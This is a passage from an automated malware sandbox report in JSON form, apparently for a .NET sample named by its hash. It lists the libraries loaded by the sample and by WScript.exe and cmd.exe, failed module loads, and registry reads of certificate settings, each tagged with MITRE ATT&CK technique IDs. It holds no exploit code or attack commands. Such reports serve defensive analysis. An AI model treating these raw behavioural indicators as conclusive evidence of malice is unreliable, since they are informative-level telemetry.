\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter C:\\ntdll.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter rasapi32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter RASMAN.DLL (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter rtutils.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter secur32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter ncrypt.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter crypt32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter CRYPT32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter USERENV.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005752)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00001988)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00001988)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005672)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005672)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005672)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005672)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"C:\\ntdll.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll\" - [base:0; Status:c0000135]\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll\" - [base:0; Status:c0000135]\n \"WScript.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WScript.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-18", "type": 3, "relevance": 10, "name": "Accesses Software Policy Settings", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-17", "type": 3, "relevance": 10, "name": "Accesses System Certificates Settings", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE\"; Key: \"DISALLOWEDCERTSYNCDELTATIME\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\MY\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\2E4916B07F3DE90C8DDE2566FD9B9B400D89BBBA\"; Key: \"BLOB\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\5AEAEE3F7F2A9449CEBAFEEC68FDD184F20124A7\"; Key: \"BLOB\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\E6A3B45B062D509B3382282D196EFE97D5956CCB\"; Key: \"BLOB\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\F5AD0BCC1AD56CD150725B1C866C30AD92EF21B0\"; Key: \"BLOB\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: 